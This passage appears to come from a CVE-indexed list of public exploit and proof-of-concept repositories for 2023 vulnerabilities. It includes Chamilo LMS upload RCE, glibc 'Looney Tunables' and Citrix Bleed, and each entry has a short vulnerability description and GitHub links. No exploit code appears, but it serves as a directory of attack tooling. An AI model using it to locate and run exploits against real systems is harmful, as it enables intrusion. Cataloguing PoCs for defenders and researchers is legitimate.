\nUsername enumeration is possible through Bypassing CAPTCHA in On-premise SureMDM Solution on Windows deployment allows attacker to enumerate local user information via error message.\n\nThis issue affects SureMDM On-premise: 6.31 and below version \n\n
- [jFriedli/CVE-2023-3897](https://github.com/jFriedli/CVE-2023-3897)
### CVE-2023-3971 (2023-10-04)
An HTML injection flaw was found in Controller in the user interface settings. This flaw allows an attacker to capture credentials by creating a custom login page by injecting HTML, resulting in a complete compromise.
- [ashangp923/CVE-2023-3971](https://github.com/ashangp923/CVE-2023-3971)
### CVE-2023-4128
- [Trinadh465/linux-4.1.15_CVE-2023-4128](https://github.com/Trinadh465/linux-4.1.15_CVE-2023-4128)
### CVE-2023-4145 (2023-08-03)
Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/customer-data-framework prior to 3.4.2.
- [miguelc49/CVE-2023-4145-2](https://github.com/miguelc49/CVE-2023-4145-2)
- [miguelc49/CVE-2023-4145-1](https://github.com/miguelc49/CVE-2023-4145-1)
- [miguelc49/CVE-2023-4145-3](https://github.com/miguelc49/CVE-2023-4145-3)
### CVE-2023-4165 (2023-08-05)
Es wurde eine kritische Schwachstelle in Tongda OA gefunden. Hiervon betroffen ist ein unbekannter Codeblock der Datei general/system/seal_manage/iweboffice/delete_seal.php. Dank der Manipulation des Arguments DELETE_STR mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 11.10 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.
- [mvpyyds/CVE-2023-4165](https://github.com/mvpyyds/CVE-2023-4165)
### CVE-2023-4166 (2023-08-05)
In Tongda OA wurde eine kritische Schwachstelle gefunden. Betroffen ist eine unbekannte Verarbeitung der Datei general/system/seal_manage/dianju/delete_log.php. Dank Manipulation des Arguments DELETE_STR mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 11.10 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.
- [mvpyyds/CVE-2023-4166](https://github.com/mvpyyds/CVE-2023-4166)
### CVE-2023-4169 (2023-08-05)
In Ruijie RG-EW1200G 1.0(1)B1P5 wurde eine kritische Schwachstelle ausgemacht. Es geht um eine nicht näher bekannte Funktion der Datei /api/sys/set_passwd der Komponente Administrator Password Handler. Durch Manipulation mit unbekannten Daten kann eine improper access controls-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
- [thedarknessdied/CVE-2023-4169_CVE-2023-3306_CVE-2023-4415](https://github.com/thedarknessdied/CVE-2023-4169_CVE-2023-3306_CVE-2023-4415)
### CVE-2023-4174 (2023-08-06)
In mooSocial mooStore 3.1.6 wurde eine Schwachstelle gefunden. Sie wurde als problematisch eingestuft. Hierbei betrifft es unbekannten Programmcode. Mittels Manipulieren mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk.
- [d0rb/CVE-2023-4174](https://github.com/d0rb/CVE-2023-4174)
### CVE-2023-4197 (2023-11-01)
Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code.
- [alien-keric/CVE-2023-4197](https://github.com/alien-keric/CVE-2023-4197)
### CVE-2023-4206 (2023-09-06)
A use-after-free vulnerability in the Linux kernel's net/sched: cls_route component can be exploited to achieve local privilege escalation.\n\nWhen route4_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free.\n\nWe recommend upgrading past commit b80b829e9e2c1b3f7aae34855e04d8f6ecaf13c8.\n\n
- [hshivhare67/Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208](https://github.com/hshivhare67/Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208)
### CVE-2023-4220 (2023-11-28)
Unrestricted file upload in big file upload functionality in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell.
- [m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc](https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc)
- [dollarboysushil/Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220](https://github.com/dollarboysushil/Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220)
- [charlesgargasson/CVE-2023-4220](https://github.com/charlesgargasson/CVE-2023-4220)
- [insomnia-jacob/CVE-2023-4220](https://github.com/insomnia-jacob/CVE-2023-4220)
- [Ziad-Sakr/Chamilo-CVE-2023-4220-Exploit](https://github.com/Ziad-Sakr/Chamilo-CVE-2023-4220-Exploit)
- [HO4XXX/cve-2023-4220-poc](https://github.com/HO4XXX/cve-2023-4220-poc)
- [B1TC0R3/CVE-2023-4220-PoC](https://github.com/B1TC0R3/CVE-2023-4220-PoC)
- [nr4x4/CVE-2023-4220](https://github.com/nr4x4/CVE-2023-4220)
- [Al3xGD/CVE-2023-4220-Exploit](https://github.com/Al3xGD/CVE-2023-4220-Exploit)
- [charchit-subedi/chamilo-lms-unauthenticated-rce-poc](https://github.com/charchit-subedi/chamilo-lms-unauthenticated-rce-poc)
- [LGenAgul/CVE-2023-4220-Proof-of-concept](https://github.com/LGenAgul/CVE-2023-4220-Proof-of-concept)
- [VanishedPeople/CVE-2023-4220](https://github.com/VanishedPeople/CVE-2023-4220)
- [thefizzyfish/CVE-2023-4220](https://github.com/thefizzyfish/CVE-2023-4220)
- [qrxnz/CVE-2023-4220](https://github.com/qrxnz/CVE-2023-4220)
- [0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit](https://github.com/0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit)
- [bueno-armando/CVE-2023-4220-RCE](https://github.com/bueno-armando/CVE-2023-4220-RCE)
- [TanveerS1ngh/Chamilo-LMS-CVE-2023-4220-Exploit](https://github.com/TanveerS1ngh/Chamilo-LMS-CVE-2023-4220-Exploit)
### CVE-2023-4226 (2023-11-28)
Unrestricted file upload in `/main/inc/ajax/work.ajax.php` in Chamilo LMS <= v1.11.24 allows authenticated attackers with learner role to obtain remote code execution via uploading of PHP files.
- [krishnan-tech/CVE-2023-4226-POC](https://github.com/krishnan-tech/CVE-2023-4226-POC)
### CVE-2023-4278 (2023-09-11)
The MasterStudy LMS WordPress Plugin WordPress plugin before 3.0.18 does not have proper checks in place during registration allowing anyone to register on the site as an instructor. They can then add courses and/or posts.
- [revan-ar/CVE-2023-4278](https://github.com/revan-ar/CVE-2023-4278)
### CVE-2023-4279 (2023-09-04)
This User Activity Log WordPress plugin before 1.6.7 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic.
- [b0marek/CVE-2023-4279](https://github.com/b0marek/CVE-2023-4279)
### CVE-2023-4281 (2023-09-25)
This Activity Log WordPress plugin before 2.8.8 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic.
- [b0marek/CVE-2023-4281](https://github.com/b0marek/CVE-2023-4281)
### CVE-2023-4294 (2023-09-11)
The URL Shortify WordPress plugin before 1.7.6 does not properly escape the value of the referer header, thus allowing an unauthenticated attacker to inject malicious javascript that will trigger in the plugins admin panel with statistics of the created short link.
- [b0marek/CVE-2023-4294](https://github.com/b0marek/CVE-2023-4294)
### CVE-2023-4357 (2023-08-15)
Insufficient validation of untrusted input in XML in Google Chrome prior to 116.0.5845.96 allowed a remote attacker to bypass file access restrictions via a crafted HTML page. (Chromium security severity: Medium)
- [xcanwin/CVE-2023-4357-Chrome-XXE](https://github.com/xcanwin/CVE-2023-4357-Chrome-XXE)
- [OgulcanUnveren/CVE-2023-4357-APT-Style-exploitation](https://github.com/OgulcanUnveren/CVE-2023-4357-APT-Style-exploitation)
- [passwa11/CVE-2023-4357-APT-Style-exploitation](https://github.com/passwa11/CVE-2023-4357-APT-Style-exploitation)
- [sunu11/chrome-CVE-2023-4357](https://github.com/sunu11/chrome-CVE-2023-4357)
- [WinnieZy/CVE-2023-4357](https://github.com/WinnieZy/CVE-2023-4357)
- [lon5948/CVE-2023-4357-Exploitation](https://github.com/lon5948/CVE-2023-4357-Exploitation)
- [CamillaFranceschini/CVE-2023-4357](https://github.com/CamillaFranceschini/CVE-2023-4357)
### CVE-2023-4427 (2023-08-22)
Out of bounds memory access in V8 in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)
- [tianstcht/CVE-2023-4427](https://github.com/tianstcht/CVE-2023-4427)
### CVE-2023-4450 (2023-08-21)
In jeecgboot JimuReport bis 1.6.0 wurde eine kritische Schwachstelle ausgemacht. Das betrifft eine unbekannte Funktionalität der Komponente Template Handler. Durch Manipulation mit unbekannten Daten kann eine injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 1.6.1 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.
- [ilikeoyt/CVE-2023-4450-Attack](https://github.com/ilikeoyt/CVE-2023-4450-Attack)
### CVE-2023-4460 (2023-12-04)
The Uploading SVG, WEBP and ICO files WordPress plugin through 1.2.1 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.
- [0xn4d/poc-cve-xss-uploading-svg](https://github.com/0xn4d/poc-cve-xss-uploading-svg)
### CVE-2023-4542 (2023-08-25)
Es wurde eine Schwachstelle in D-Link DAR-8000-10 bis 20230809 ausgemacht. Sie wurde als kritisch eingestuft. Es geht dabei um eine nicht klar definierte Funktion der Datei /app/sys1.php. Durch das Manipulieren des Arguments cmd mit der Eingabe id mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.
- [PumpkinBridge/CVE-2023-4542](https://github.com/PumpkinBridge/CVE-2023-4542)
### CVE-2023-4549 (2023-09-25)
The DoLogin Security WordPress plugin before 3.7 does not properly sanitize IP addresses coming from the X-Forwarded-For header, which can be used by attackers to conduct Stored XSS attacks via WordPress' login form.
- [b0marek/CVE-2023-4549](https://github.com/b0marek/CVE-2023-4549)
### CVE-2023-4568 (2023-09-13)
PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.
- [Cappricio-Securities/CVE-2023-4568](https://github.com/Cappricio-Securities/CVE-2023-4568)
### CVE-2023-4590 (2023-11-27)
Buffer overflow vulnerability in Frhed hex editor, affecting version 1.6.0. This vulnerability could allow an attacker to execute arbitrary code via a long filename argument through the Structured Exception Handler (SEH) registers.
- [dgndrn/CVE-2023-4590](https://github.com/dgndrn/CVE-2023-4590)
### CVE-2023-4596 (2023-08-30)
The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
- [E1A/CVE-2023-4596](https://github.com/E1A/CVE-2023-4596)
- [X-Projetion/CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version](https://github.com/X-Projetion/CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version)
- [X-Projetion/CVE-2023-4596-OpenSSH-Multi-Checker](https://github.com/X-Projetion/CVE-2023-4596-OpenSSH-Multi-Checker)
### CVE-2023-4622 (2023-09-06)
A use-after-free vulnerability in the Linux kernel's af_unix component can be exploited to achieve local privilege escalation.\n\nThe unix_stream_sendpage() function tries to add data to the last skb in the peer's recv queue without locking the queue. Thus there is a race where unix_stream_sendpage() could access an skb locklessly that is being released by garbage collection, resulting in use-after-free.\n\nWe recommend upgrading past commit 790c2f9d15b594350ae9bca7b236f2b1859de02c.\n\n
- [0range1337/CVE-CVE-2023-4622](https://github.com/0range1337/CVE-CVE-2023-4622)
### CVE-2023-4631 (2023-09-25)
The DoLogin Security WordPress plugin before 3.7 uses headers such as the X-Forwarded-For to retrieve the IP address of the request, which could lead to IP spoofing.
- [b0marek/CVE-2023-4631](https://github.com/b0marek/CVE-2023-4631)
### CVE-2023-4634 (2023-09-06)
The Media Library Assistant plugin for WordPress is vulnerable to Local File Inclusion and Remote Code Execution in versions up to, and including, 3.09. This is due to insufficient controls on file paths being supplied to the 'mla_stream_file' parameter from the ~/includes/mla-stream-image.php file, where images are processed via Imagick(). This makes it possible for unauthenticated attackers to supply files via FTP that will make directory lists, local file inclusion, and remote code execution possible.
- [Patrowl/CVE-2023-4634](https://github.com/Patrowl/CVE-2023-4634)
### CVE-2023-4636 (2023-09-05)
The WordPress File Sharing Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
- [ThatNotEasy/CVE-2023-4636](https://github.com/ThatNotEasy/CVE-2023-4636)
### CVE-2023-4683 (2023-08-31)
NULL Pointer Dereference in GitHub repository gpac/gpac prior to 2.3-DEV.
- [Songg45/CVE-2023-4683-Test](https://github.com/Songg45/CVE-2023-4683-Test)
### CVE-2023-4696 (2023-09-01)
Improper Access Control in GitHub repository usememos/memos prior to 0.13.2.
- [mnqazi/CVE-2023-4696](https://github.com/mnqazi/CVE-2023-4696)
### CVE-2023-4698 (2023-09-01)
Improper Input Validation in GitHub repository usememos/memos prior to 0.13.2.
- [mnqazi/CVE-2023-4698](https://github.com/mnqazi/CVE-2023-4698)
### CVE-2023-4699 (2023-11-06)
Insufficient Verification of Data Authenticity vulnerability in Mitsubishi Electric Corporation MELSEC-F Series main modules and MELSEC iQ-F Series CPU modules allows a remote unauthenticated attacker to reset the memory of the products to factory default state and cause denial-of-service (DoS) condition on the products by sending specific packets.\n\n\n\n\n\n\n
- [Scottzxor/Citrix-Bleed-Buffer-Overread-Demo](https://github.com/Scottzxor/Citrix-Bleed-Buffer-Overread-Demo)
### CVE-2023-4741 (2023-09-03)
In IBOS OA 4.5.5 wurde eine kritische Schwachstelle gefunden. Es geht um eine nicht näher bekannte Funktion der Datei ?r=diary/default/del der Komponente Delete Logs Handler. Durch das Manipulieren mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
- [wudidike/CVE-2023-4741](https://github.com/wudidike/CVE-2023-4741)
### CVE-2023-4762 (2023-09-05)
Type Confusion in V8 in Google Chrome prior to 116.0.5845.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)
- [buptsb/CVE-2023-4762](https://github.com/buptsb/CVE-2023-4762)
- [sherlocksecurity/CVE-2023-4762-Code-Review](https://github.com/sherlocksecurity/CVE-2023-4762-Code-Review)
### CVE-2023-4771 (2023-11-16)
A Cross-Site scripting vulnerability has been found in CKSource CKEditor affecting versions 4.15.1 and earlier. An attacker could send malicious javascript code through the /ckeditor/samples/old/ajax.html file and retrieve an authorized user's information.
- [sahar042/CVE-2023-4771](https://github.com/sahar042/CVE-2023-4771)
### CVE-2023-4800 (2023-10-16)
The DoLogin Security WordPress plugin before 3.7.1 does not restrict the access of a widget that shows the IPs of failed logins to low privileged users.
- [b0marek/CVE-2023-4800](https://github.com/b0marek/CVE-2023-4800)
### CVE-2023-4813 (2023-09-12)
A flaw was found in glibc. In an uncommon situation, the gaih_inet function may use memory that has been freed, resulting in an application crash. This issue is only exploitable when the getaddrinfo function is called and the hosts database in /etc/nsswitch.conf is configured with SUCCESS=continue or SUCCESS=merge.
- [tnishiox/cve-2023-4813](https://github.com/tnishiox/cve-2023-4813)
### CVE-2023-4863 (2023-09-12)
Heap buffer overflow in libwebp in Google Chrome prior to 116.0.5845.187 and libwebp 1.3.2 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: Critical)
- [mistymntncop/CVE-2023-4863](https://github.com/mistymntncop/CVE-2023-4863)
- [bbaranoff/CVE-2023-4863](https://github.com/bbaranoff/CVE-2023-4863)
- [talbeerysec/BAD-WEBP-CVE-2023-4863](https://github.com/talbeerysec/BAD-WEBP-CVE-2023-4863)
- [OITApps/Find-VulnerableElectronVersion](https://github.com/OITApps/Find-VulnerableElectronVersion)
- [GTGalaxi/ElectronVulnerableVersion](https://github.com/GTGalaxi/ElectronVulnerableVersion)
- [murphysecurity/libwebp-checker](https://github.com/murphysecurity/libwebp-checker)
- [huiwen-yayaya/CVE-2023-4863](https://github.com/huiwen-yayaya/CVE-2023-4863)
- [LiveOverflow/webp-CVE-2023-4863](https://github.com/LiveOverflow/webp-CVE-2023-4863)
- [caoweiquan322/NotEnough](https://github.com/caoweiquan322/NotEnough)
- [CrackerCat/CVE-2023-4863-](https://github.com/CrackerCat/CVE-2023-4863-)
- [sarsaeroth/CVE-2023-4863-POC](https://github.com/sarsaeroth/CVE-2023-4863-POC)
### CVE-2023-4911 (2023-10-03)
A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. This issue could allow a local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when launching binaries with SUID permission to execute code with elevated privileges.
- [Green-Avocado/CVE-2023-4911](https://github.com/Green-Avocado/CVE-2023-4911)
- [leesh3288/CVE-2023-4911](https://github.com/leesh3288/CVE-2023-4911)
- [RickdeJager/CVE-2023-4911](https://github.com/RickdeJager/CVE-2023-4911)
- [xiaoQ1z/CVE-2023-4911](https://github.com/xiaoQ1z/CVE-2023-4911)
- [silent6trinity/looney-tuneables](https://github.com/silent6trinity/looney-tuneables)
- [hadrian3689/looney-tunables-CVE-2023-4911](https://github.com/hadrian3689/looney-tunables-CVE-2023-4911)
- [ruycr4ft/CVE-2023-4911](https://github.com/ruycr4ft/CVE-2023-4911)
- [guffre/CVE-2023-4911](https://github.com/guffre/CVE-2023-4911)
- [chaudharyarjun/LooneyPwner](https://github.com/chaudharyarjun/LooneyPwner)
- [KernelKrise/CVE-2023-4911](https://github.com/KernelKrise/CVE-2023-4911)
- [Diego-AltF4/CVE-2023-4911](https://github.com/Diego-AltF4/CVE-2023-4911)
- [teraGL/looneyCVE](https://github.com/teraGL/looneyCVE)
- [snurkeburk/Looney-Tunables](https://github.com/snurkeburk/Looney-Tunables)
- [puckiestyle/CVE-2023-4911](https://github.com/puckiestyle/CVE-2023-4911)
- [yanfernandess/Looney-Tunables-CVE-2023-4911](https://github.com/yanfernandess/Looney-Tunables-CVE-2023-4911)
- [NishanthAnand21/CVE-2023-4911-PoC](https://github.com/NishanthAnand21/CVE-2023-4911-PoC)
### CVE-2023-4966 (2023-10-10)
Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server. \n\n\n\n
- [Chocapikk/CVE-2023-4966](https://github.com/Chocapikk/CVE-2023-4966)
- [dinosn/citrix_cve-2023-4966](https://github.com/dinosn/citrix_cve-2023-4966)
- [senpaisamp/Netscaler-CVE-2023-4966-POC](https://github.com/senpaisamp/Netscaler-CVE-2023-4966-POC)
- [mlynchcogent/CVE-2023-4966-POC](https://github.com/mlynchcogent/CVE-2023-4966-POC)
- [IceBreakerCode/CVE-2023-4966](https://github.com/IceBreakerCode/CVE-2023-4966)
- [0xKayala/CVE-2023-4966](https://github.com/0xKayala/CVE-2023-4966)
- [certat/citrix-logchecker](https://github.com/certat/citrix-logchecker)
- [RevoltSecurities/CVE-2023-4966](https://github.com/RevoltSecurities/CVE-2023-4966)
- [s-bt/CVE-2023-4966](https://github.com/s-bt/CVE-2023-4966)
- [byte4RR4Y/CVE-2023-4966](https://github.com/byte4RR4Y/CVE-2023-4966)
- [jmussmann/cve-2023-4966-iocs](https://github.com/jmussmann/cve-2023-4966-iocs)
- [morganwdavis/overread](https://github.com/morganwdavis/overread)
- [LucasOneZ/CVE-2023-4966](https://github.com/LucasOneZ/CVE-2023-4966)
### CVE-2023-5024 (2023-09-17)
Es wurde eine Schwachstelle in Planno 23.04.04 ausgemacht. Sie wurde als problematisch eingestuft. Es betrifft eine unbekannte Funktion der Komponente Comment Handler. Durch Beeinflussen mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
- [PH03N1XSP/CVE-2023-5024](https://github.com/PH03N1XSP/CVE-2023-5024)
### CVE-2023-5043 (2023-10-25)
Ingress nginx annotation injection causes arbitrary command execution.\n
- [r0binak/CVE-2023-5043](https://github.com/r0binak/CVE-2023-5043)
### CVE-2023-5044 (2023-10-25)
Code injection via nginx.ingress.kubernetes.io/permanent-redirect annotation.\n
- [r0binak/CVE-2023-5044](https://github.com/r0binak/CVE-2023-5044)
- [4ARMED/cve-2023-5044](https://github.com/4ARMED/cve-2023-5044)
- [KubernetesBachelor/CVE-2023-5044](https://github.com/KubernetesBachelor/CVE-2023-5044)
### CVE-2023-5070 (2023-10-20)
The Social Media Share Buttons & Social Sharing Icons plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 2.8.5 via the sfsi_save_export function. This can allow subscribers to export plugin settings that include social media authentication tokens and secrets as well as app passwords.
- [RandomRobbieBF/CVE-2023-5070](https://github.com/RandomRobbieBF/CVE-2023-5070)
### CVE-2023-5089 (2023-10-16)
The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.
- [Cappricio-Securities/CVE-2023-5089](https://github.com/Cappricio-Securities/CVE-2023-5089)
### CVE-2023-5142 (2023-09-24)
In H3C GR-1100-P, GR-1108-P, GR-1200W, GR-1800AX, GR-2200, GR-3200, GR-5200, GR-8300, ER2100n, ER2200G2, ER3200G2, ER3260G2, ER5100G2, ER5200G2 and ER6300G2 bis 20230908 wurde eine Schwachstelle entdeckt. Sie wurde als problematisch eingestuft. Dabei geht es um eine nicht genauer bekannte Funktion der Datei /userLogin.asp der Komponente Config File Handler. Durch das Beeinflussen mit unbekannten Daten kann eine path traversal-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Die Komplexität eines Angriffs ist eher hoch. Das Ausnutzen gilt als schwierig. Der Exploit steht zur öffentlichen Verfügung.
- [kuangxiaotu/CVE-H3C-Report](https://github.com/kuangxiaotu/CVE-H3C-Report)
### CVE-2023-5178 (2023-11-01)
A use-after-free vulnerability was found in drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe/TCP subsystem in the Linux kernel. This issue may allow a malicious user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation.
- [rockrid3r/CVE-2023-5178](https://github.com/rockrid3r/CVE-2023-5178)
### CVE-2023-5204 (2023-10-19)
The ChatBot plugin for WordPress is vulnerable to SQL Injection via the $strid parameter in versions up to, and including, 4.8.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [RandomRobbieBF/CVE-2023-5204](https://github.com/RandomRobbieBF/CVE-2023-5204)
### CVE-2023-5217 (2023-09-28)
Heap buffer overflow in vp8 encoding in libvpx in Google Chrome prior to 117.0.5938.132 and libvpx 1.13.1 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
- [UT-Security/cve-2023-5217-poc](https://github.com/UT-Security/cve-2023-5217-poc)
- [Trinadh465/platform_external_libvpx_v1.8.0_CVE-2023-5217](https://github.com/Trinadh465/platform_external_libvpx_v1.8.0_CVE-2023-5217)
- [Trinadh465/platform_external_libvpx_v1.4.0_CVE-2023-5217](https://github.com/Trinadh465/platform_external_libvpx_v1.4.0_CVE-2023-5217)
### CVE-2023-5324 (2023-10-01)
In eeroOS bis 6.16.4-11 wurde eine kritische Schwachstelle gefunden. Hierbei betrifft es unbekannten Programmcode der Komponente Ethernet Interface. Durch die Manipulation mit unbekannten Daten kann eine denial of service-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff im lokalen Netzwerk. Der Exploit steht zur öffentlichen Verfügung.
- [nomis/eero-zero-length-ipv6-options-header-dos](https://github.com/nomis/eero-zero-length-ipv6-options-header-dos)
### CVE-2023-5360 (2023-10-31)
The Royal Elementor Addons and Templates WordPress plugin before 1.3.79 does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE.
- [sagsooz/CVE-2023-5360](https://github.com/sagsooz/CVE-2023-5360)
- [phankz/Worpress-CVE-2023-5360](https://github.com/phankz/Worpress-CVE-2023-5360)
- [nastar-id/CVE-2023-5360](https://github.com/nastar-id/CVE-2023-5360)
- [Chocapikk/CVE-2023-5360](https://github.com/Chocapikk/CVE-2023-5360)
- [tucommenceapousser/CVE-2023-5360](https://github.com/tucommenceapousser/CVE-2023-5360)
- [Jenderal92/WP-CVE-2023-5360](https://github.com/Jenderal92/WP-CVE-2023-5360)
- [Pushkarup/CVE-2023-5360](https://github.com/Pushkarup/CVE-2023-5360)
- [angkerithhack001/CVE-2023-5360-PoC](https://github.com/angkerithhack001/CVE-2023-5360-PoC)
### CVE-2023-5412 (2023-10-31)
The Image horizontal reel scroll slideshow plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 13.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [RandomRobbieBF/CVE-2023-5412](https://github.com/RandomRobbieBF/CVE-2023-5412)
### CVE-2023-5521 (2023-10-11)
Incorrect Authorization in GitHub repository tiann/kernelsu prior to v0.6.9.
- [Ylarod/CVE-2023-5521](https://github.com/Ylarod/CVE-2023-5521)
### CVE-2023-5538 (2023-10-18)
The MpOperationLogs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the IP Request Headers in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
- [juweihuitao/MpOperationLogs](https://github.com/juweihuitao/MpOperationLogs)
### CVE-2023-5539 (2023-11-09)
A remote code execution risk was identified in the Lesson activity. By default this was only available to teachers and managers.
- [cli-ish/CVE-2023-5539](https://github.com/cli-ish/CVE-2023-5539)
### CVE-2023-5540 (2023-11-09)
A remote code execution risk was identified in the IMSCP activity. By default this was only available to teachers and managers.
- [cli-ish/CVE-2023-5540](https://github.com/cli-ish/CVE-2023-5540)
### CVE-2023-5546 (2023-11-09)
ID numbers displayed in the quiz grading report required additional sanitizing to prevent a stored XSS risk.
- [obelia01/CVE-2023-5546](https://github.com/obelia01/CVE-2023-5546)
### CVE-2023-5561 (2023-10-16)
WordPress does not properly restrict which user fields are searchable via the REST API, allowing unauthenticated attackers to discern the email addresses of users who have published public posts on an affected website via an Oracle style attack
- [pog007/CVE-2023-5561-PoC](https://github.com/pog007/CVE-2023-5561-PoC)
### CVE-2023-5717 (2023-10-25)
A heap out-of-bounds write vulnerability in the Linux kernel's Linux Kernel Performance Events (perf) component can be exploited to achieve local privilege escalation.\n\nIf perf_read_group() is called while an event's sibling_list is smaller than its child's sibling_list, it can increment or write to memory locations outside of the allocated buffer.\n\nWe recommend upgrading past commit 32671e3799ca2e4590773fd0e63aaa4229e50c06.\n\n
- [uthrasri/CVE-2023-5717](https://github.com/uthrasri/CVE-2023-5717)
### CVE-2023-5720 (2023-11-15)
A flaw was found in Quarkus, where it does not properly sanitize artifacts created using the Gradle plugin, allowing certain build system information to remain. This flaw allows an attacker to access potentially sensitive information from the build system within the application.
- [miguelc49/CVE-2023-5720-2](https://github.com/miguelc49/CVE-2023-5720-2)
- [miguelc49/CVE-2023-5720-1](https://github.com/miguelc49/CVE-2023-5720-1)
- [miguelc49/CVE-2023-5720-3](https://github.com/miguelc49/CVE-2023-5720-3)
### CVE-2023-5808 (2023-12-04)
SMU versions prior to 14.8.7825.01 are susceptible to unintended information disclosure, through URL manipulation. Authenticated users in a Storage administrative role are able to access HNAS configuration backup and diagnostic data, that would normally be barred to that specific administrative role.
- [Arszilla/CVE-2023-5808](https://github.com/Arszilla/CVE-2023-5808)
### CVE-2023-5961 (2023-12-23)
A Cross-Site Request Forgery (CSRF) vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. An attacker can exploit this vulnerability to trick a client into making an unintentional request to the web server, which will be treated as an authentic request. This vulnerability may lead an attacker to perform operations on behalf of the victimized user.\n\n
- [HadessCS/CVE-2023-5961](https://github.com/HadessCS/CVE-2023-5961)
### CVE-2023-5965 (2023-11-30)
An authenticated privileged attacker could upload a specially crafted zip to the EspoCRM server in version 7.2.5, via the update form, which could lead to arbitrary PHP code execution.
- [pedrojosenavasperez/cve-2023-5965](https://github.com/pedrojosenavasperez/cve-2023-5965)
### CVE-2023-5966 (2023-11-30)
